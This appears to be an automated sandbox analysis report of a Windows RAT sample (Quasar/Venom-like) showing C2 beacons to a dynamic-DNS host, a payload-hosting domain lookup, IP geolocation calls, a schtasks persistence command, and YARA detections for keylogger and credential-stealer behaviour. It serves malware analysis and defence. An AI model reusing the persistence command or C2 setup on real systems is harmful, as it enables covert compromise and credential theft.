                                      Oct 15, 2022 08:28:34.639561892 CEST16044971737.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:39.705773115 CEST497181604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:39.733094931 CEST16044971837.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:40.315483093 CEST497181604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:40.343293905 CEST16044971837.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:41.003043890 CEST497181604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:41.031024933 CEST16044971837.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:45.824522018 CEST497191604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:45.851933002 CEST16044971937.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:46.362817049 CEST497191604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:46.390386105 CEST16044971937.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:47.065993071 CEST497191604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:47.093233109 CEST16044971937.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:52.723797083 CEST497201604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:52.751267910 CEST16044972037.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:53.254122019 CEST497201604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:53.281689882 CEST16044972037.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:53.879133940 CEST497201604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:53.906517982 CEST16044972037.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:58.081650972 CEST497211604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:58.108736992 CEST16044972137.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:58.613915920 CEST497211604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:58.641725063 CEST16044972137.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:59.317069054 CEST497211604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:59.344130039 CEST16044972137.0.14.217192.168.2.7
                                      Oct 15, 2022 08:29:03.600888968 CEST497221604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:29:03.627872944 CEST16044972237.0.14.217192.168.2.7
                                      Oct 15, 2022 08:29:04.317533970 CEST497221604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:29:04.344590902 CEST16044972237.0.14.217192.168.2.7
                                      Oct 15, 2022 08:29:04.929686069 CEST497221604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:29:04.956866026 CEST16044972237.0.14.217192.168.2.7
                                      Oct 15, 2022 08:29:08.824320078 CEST497231604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:29:08.853256941 CEST16044972337.0.14.217192.168.2.7
                                      Oct 15, 2022 08:29:09.364825010 CEST497231604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:29:09.393595934 CEST16044972337.0.14.217192.168.2.7
                                      Oct 15, 2022 08:29:10.068022966 CEST497231604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:29:10.095453978 CEST16044972337.0.14.217192.168.2.7
                                      Oct 15, 2022 08:29:14.420727968 CEST497251604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:29:14.448306084 CEST16044972537.0.14.217192.168.2.7
                                      Oct 15, 2022 08:29:15.105366945 CEST497251604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:29:15.132637024 CEST16044972537.0.14.217192.168.2.7
                                      Oct 15, 2022 08:29:15.720906973 CEST497251604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:29:15.748411894 CEST16044972537.0.14.217192.168.2.7
                                      Oct 15, 2022 08:29:19.947464943 CEST497261604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:29:19.975265980 CEST16044972637.0.14.217192.168.2.7
                                      Oct 15, 2022 08:29:20.510970116 CEST497261604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:29:20.538357019 CEST16044972637.0.14.217192.168.2.7
                                      Oct 15, 2022 08:29:21.112782001 CEST497261604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:29:21.140331984 CEST16044972637.0.14.217192.168.2.7
                                      Oct 15, 2022 08:29:25.013907909 CEST497271604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:29:25.041651964 CEST16044972737.0.14.217192.168.2.7
                                      Oct 15, 2022 08:29:25.556905985 CEST497271604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:29:25.584089041 CEST16044972737.0.14.217192.168.2.7
                                      Oct 15, 2022 08:29:26.088227034 CEST497271604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:29:26.115490913 CEST16044972737.0.14.217192.168.2.7
                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 15, 2022 08:26:50.910263062 CEST5947753192.168.2.78.8.8.8
                                      Oct 15, 2022 08:26:50.929222107 CEST53594778.8.8.8192.168.2.7
                                      Oct 15, 2022 08:26:57.588939905 CEST5575253192.168.2.78.8.8.8
                                      Oct 15, 2022 08:26:57.608477116 CEST53557528.8.8.8192.168.2.7
                                      Oct 15, 2022 08:27:00.976942062 CEST5033053192.168.2.78.8.8.8
                                      Oct 15, 2022 08:27:01.113522053 CEST53503308.8.8.8192.168.2.7
                                      Oct 15, 2022 08:27:10.385592937 CEST5658853192.168.2.78.8.8.8
                                      Oct 15, 2022 08:27:10.553450108 CEST53565888.8.8.8192.168.2.7
                                      Oct 15, 2022 08:27:16.031843901 CEST6032653192.168.2.78.8.8.8
                                      Oct 15, 2022 08:27:16.172698021 CEST53603268.8.8.8192.168.2.7
                                      Oct 15, 2022 08:27:21.755971909 CEST5083553192.168.2.78.8.8.8
                                      Oct 15, 2022 08:27:21.927035093 CEST53508358.8.8.8192.168.2.7
                                      Oct 15, 2022 08:27:27.166507959 CEST5050553192.168.2.78.8.8.8
                                      Oct 15, 2022 08:27:27.186427116 CEST53505058.8.8.8192.168.2.7
                                      Oct 15, 2022 08:27:32.568782091 CEST6117853192.168.2.78.8.8.8
                                      Oct 15, 2022 08:27:32.587927103 CEST53611788.8.8.8192.168.2.7
                                      Oct 15, 2022 08:27:37.930335045 CEST6392653192.168.2.78.8.8.8
                                      Oct 15, 2022 08:27:38.104348898 CEST53639268.8.8.8192.168.2.7
                                      Oct 15, 2022 08:27:43.521737099 CEST5333653192.168.2.78.8.8.8
                                      Oct 15, 2022 08:27:43.541179895 CEST53533368.8.8.8192.168.2.7
                                      Oct 15, 2022 08:27:48.710654974 CEST5100753192.168.2.78.8.8.8
                                      Oct 15, 2022 08:27:48.730171919 CEST53510078.8.8.8192.168.2.7
                                      Oct 15, 2022 08:27:54.056564093 CEST5051353192.168.2.78.8.8.8
                                      Oct 15, 2022 08:27:54.195616007 CEST53505138.8.8.8192.168.2.7
                                      Oct 15, 2022 08:28:00.241759062 CEST6076553192.168.2.78.8.8.8
                                      Oct 15, 2022 08:28:00.262510061 CEST53607658.8.8.8192.168.2.7
                                      Oct 15, 2022 08:28:05.308725119 CEST5828353192.168.2.78.8.8.8
                                      Oct 15, 2022 08:28:05.325809956 CEST53582838.8.8.8192.168.2.7
                                      Oct 15, 2022 08:28:10.554141998 CEST5002453192.168.2.78.8.8.8
                                      Oct 15, 2022 08:28:10.692661047 CEST53500248.8.8.8192.168.2.7
                                      Oct 15, 2022 08:28:16.028342962 CEST4951653192.168.2.78.8.8.8
                                      Oct 15, 2022 08:28:16.048415899 CEST53495168.8.8.8192.168.2.7
                                      Oct 15, 2022 08:28:21.595315933 CEST6267953192.168.2.78.8.8.8
                                      Oct 15, 2022 08:28:21.733340979 CEST53626798.8.8.8192.168.2.7
                                      Oct 15, 2022 08:28:27.415644884 CEST6139253192.168.2.78.8.8.8
                                      Oct 15, 2022 08:28:27.435216904 CEST53613928.8.8.8192.168.2.7
                                      Oct 15, 2022 08:28:33.161698103 CEST5210453192.168.2.78.8.8.8
                                      Oct 15, 2022 08:28:33.181109905 CEST53521048.8.8.8192.168.2.7
                                      Oct 15, 2022 08:28:39.524317026 CEST6535653192.168.2.78.8.8.8
                                      Oct 15, 2022 08:28:39.543981075 CEST53653568.8.8.8192.168.2.7
                                      Oct 15, 2022 08:28:45.610356092 CEST5900653192.168.2.78.8.8.8
                                      Oct 15, 2022 08:28:45.629615068 CEST53590068.8.8.8192.168.2.7
                                      Oct 15, 2022 08:28:52.376017094 CEST5152653192.168.2.78.8.8.8
                                      Oct 15, 2022 08:28:52.395993948 CEST53515268.8.8.8192.168.2.7
                                      Oct 15, 2022 08:28:58.031434059 CEST5113953192.168.2.78.8.8.8
                                      Oct 15, 2022 08:28:58.048542023 CEST53511398.8.8.8192.168.2.7
                                      Oct 15, 2022 08:29:03.503179073 CEST5878453192.168.2.78.8.8.8
                                      Oct 15, 2022 08:29:03.523390055 CEST53587848.8.8.8192.168.2.7
                                      Oct 15, 2022 08:29:08.781105042 CEST5797053192.168.2.78.8.8.8
                                      Oct 15, 2022 08:29:08.800679922 CEST53579708.8.8.8192.168.2.7
                                      Oct 15, 2022 08:29:13.527925014 CEST6460853192.168.2.78.8.8.8
                                      Oct 15, 2022 08:29:13.556489944 CEST53646088.8.8.8192.168.2.7
                                      Oct 15, 2022 08:29:13.562727928 CEST5874653192.168.2.78.8.8.8
                                      Oct 15, 2022 08:29:13.591242075 CEST53587468.8.8.8192.168.2.7
                                      Oct 15, 2022 08:29:14.374480009 CEST6243353192.168.2.78.8.8.8
                                      Oct 15, 2022 08:29:14.393790960 CEST53624338.8.8.8192.168.2.7
                                      Oct 15, 2022 08:29:19.926932096 CEST6124853192.168.2.78.8.8.8
                                      Oct 15, 2022 08:29:19.946738958 CEST53612488.8.8.8192.168.2.7
                                      Oct 15, 2022 08:29:24.840133905 CEST5275053192.168.2.78.8.8.8
                                      Oct 15, 2022 08:29:25.013263941 CEST53527508.8.8.8192.168.2.7
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Oct 15, 2022 08:26:50.910263062 CEST192.168.2.78.8.8.80x2bceStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:26:57.588939905 CEST192.168.2.78.8.8.80xa853Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:27:00.976942062 CEST192.168.2.78.8.8.80xb7c5Standard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:27:10.385592937 CEST192.168.2.78.8.8.80xd20dStandard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:27:16.031843901 CEST192.168.2.78.8.8.80x1be9Standard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:27:21.755971909 CEST192.168.2.78.8.8.80x5ef3Standard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:27:27.166507959 CEST192.168.2.78.8.8.80x8fe3Standard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:27:32.568782091 CEST192.168.2.78.8.8.80x2bd2Standard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:27:37.930335045 CEST192.168.2.78.8.8.80x998Standard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:27:43.521737099 CEST192.168.2.78.8.8.80x662cStandard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:27:48.710654974 CEST192.168.2.78.8.8.80xda28Standard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:27:54.056564093 CEST192.168.2.78.8.8.80x1f98Standard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:00.241759062 CEST192.168.2.78.8.8.80x7a1fStandard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:05.308725119 CEST192.168.2.78.8.8.80xef92Standard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:10.554141998 CEST192.168.2.78.8.8.80xaadfStandard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:16.028342962 CEST192.168.2.78.8.8.80xedb2Standard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:21.595315933 CEST192.168.2.78.8.8.80xeaf7Standard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:27.415644884 CEST192.168.2.78.8.8.80x96efStandard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:33.161698103 CEST192.168.2.78.8.8.80xfa08Standard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:39.524317026 CEST192.168.2.78.8.8.80x6cbStandard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:45.610356092 CEST192.168.2.78.8.8.80xb796Standard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:52.376017094 CEST192.168.2.78.8.8.80x1b85Standard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:58.031434059 CEST192.168.2.78.8.8.80x59a7Standard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:29:03.503179073 CEST192.168.2.78.8.8.80x46b0Standard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:29:08.781105042 CEST192.168.2.78.8.8.80x6ad9Standard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:29:13.527925014 CEST192.168.2.78.8.8.80x3bedStandard query (0)payloads-poison.000webhostapp.comA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:29:13.562727928 CEST192.168.2.78.8.8.80x2b65Standard query (0)payloads-poison.000webhostapp.comA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:29:14.374480009 CEST192.168.2.78.8.8.80xcbb4Standard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:29:19.926932096 CEST192.168.2.78.8.8.80x72ceStandard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:29:24.840133905 CEST192.168.2.78.8.8.80x3dd3Standard query (0)checkme12.freeddns.orgA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Oct 15, 2022 08:26:50.929222107 CEST8.8.8.8192.168.2.70x2bceNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:26:57.608477116 CEST8.8.8.8192.168.2.70xa853No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:27:01.113522053 CEST8.8.8.8192.168.2.70xb7c5No error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:27:10.553450108 CEST8.8.8.8192.168.2.70xd20dNo error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:27:16.172698021 CEST8.8.8.8192.168.2.70x1be9No error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:27:21.927035093 CEST8.8.8.8192.168.2.70x5ef3No error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:27:27.186427116 CEST8.8.8.8192.168.2.70x8fe3No error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:27:32.587927103 CEST8.8.8.8192.168.2.70x2bd2No error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:27:38.104348898 CEST8.8.8.8192.168.2.70x998No error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:27:43.541179895 CEST8.8.8.8192.168.2.70x662cNo error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:27:48.730171919 CEST8.8.8.8192.168.2.70xda28No error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:27:54.195616007 CEST8.8.8.8192.168.2.70x1f98No error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:00.262510061 CEST8.8.8.8192.168.2.70x7a1fNo error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:05.325809956 CEST8.8.8.8192.168.2.70xef92No error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:10.692661047 CEST8.8.8.8192.168.2.70xaadfNo error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:16.048415899 CEST8.8.8.8192.168.2.70xedb2No error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:21.733340979 CEST8.8.8.8192.168.2.70xeaf7No error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:27.435216904 CEST8.8.8.8192.168.2.70x96efNo error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:33.181109905 CEST8.8.8.8192.168.2.70xfa08No error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:39.543981075 CEST8.8.8.8192.168.2.70x6cbNo error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:45.629615068 CEST8.8.8.8192.168.2.70xb796No error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:52.395993948 CEST8.8.8.8192.168.2.70x1b85No error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:28:58.048542023 CEST8.8.8.8192.168.2.70x59a7No error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:29:03.523390055 CEST8.8.8.8192.168.2.70x46b0No error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:29:08.800679922 CEST8.8.8.8192.168.2.70x6ad9No error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:29:13.556489944 CEST8.8.8.8192.168.2.70x3bedNo error (0)payloads-poison.000webhostapp.comus-east-1.route-1.000webhost.awex.ioCNAME (Canonical name)IN (0x0001)false
                                      Oct 15, 2022 08:29:13.556489944 CEST8.8.8.8192.168.2.70x3bedNo error (0)us-east-1.route-1.000webhost.awex.io145.14.145.92A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:29:13.591242075 CEST8.8.8.8192.168.2.70x2b65No error (0)payloads-poison.000webhostapp.comus-east-1.route-1.000webhost.awex.ioCNAME (Canonical name)IN (0x0001)false
                                      Oct 15, 2022 08:29:13.591242075 CEST8.8.8.8192.168.2.70x2b65No error (0)us-east-1.route-1.000webhost.awex.io145.14.145.92A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:29:14.393790960 CEST8.8.8.8192.168.2.70xcbb4No error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:29:19.946738958 CEST8.8.8.8192.168.2.70x72ceNo error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      Oct 15, 2022 08:29:25.013263941 CEST8.8.8.8192.168.2.70x3dd3No error (0)checkme12.freeddns.org37.0.14.217A (IP address)IN (0x0001)false
                                      • ip-api.com
                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.749697208.95.112.180C:\Users\user\Desktop\JeCXrQSehB.exe
                                      TimestampkBytes transferredDirectionData
                                      Oct 15, 2022 08:26:51.006464005 CEST87OUTGET /json/ HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Oct 15, 2022 08:26:51.045681953 CEST88INHTTP/1.1 200 OK
                                      Date: Sat, 15 Oct 2022 06:26:50 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 293
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 60
                                      X-Rl: 44
                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 35 22 7d
                                      Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.15"}


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      1192.168.2.749700208.95.112.180C:\Users\user\Desktop\JeCXrQSehB.exe
                                      TimestampkBytes transferredDirectionData
                                      Oct 15, 2022 08:26:57.685861111 CEST97OUTGET /json/ HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Oct 15, 2022 08:26:57.722738981 CEST97INHTTP/1.1 200 OK
                                      Date: Sat, 15 Oct 2022 06:26:56 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 293
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 60
                                      X-Rl: 44
                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 35 22 7d
                                      Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.15"}


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:08:26:45
                                      Start date:15/10/2022
                                      Path:C:\Users\user\Desktop\JeCXrQSehB.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\JeCXrQSehB.exe
                                      Imagebase:0x40000
                                      File size:547328 bytes
                                      MD5 hash:17E6BFFAFF1EA223913DEB1BC78E74AE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.254146038.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.254146038.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Quasarrat_e52df647, Description: unknown, Source: 00000000.00000003.254146038.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmp, Author: Florian Roth
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Vermin, Description: Yara detected Vermin Keylogger, Source: 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Quasarrat_e52df647, Description: unknown, Source: 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                      Reputation:low

                                      Target ID:1
                                      Start time:08:26:50
                                      Start date:15/10/2022
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:"schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Users\user\Desktop\JeCXrQSehB.exe" /rl HIGHEST /f
                                      Imagebase:0xc90000
                                      File size:185856 bytes
                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Target ID:2
                                      Start time:08:26:51
                                      Start date:15/10/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6edaf0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Target ID:3
                                      Start time:08:26:51
                                      Start date:15/10/2022
                                      Path:C:\Users\user\AppData\Roaming\UPX\Client.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\UPX\Client.exe
                                      Imagebase:0x5a0000
                                      File size:547328 bytes
                                      MD5 hash:17E6BFFAFF1EA223913DEB1BC78E74AE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Florian Roth
                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Florian Roth
                                      • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Florian Roth
                                      • Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Florian Roth
                                      • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Florian Roth
                                      • Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Florian Roth
                                      • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Florian Roth
                                      • Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Florian Roth
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Joe Security
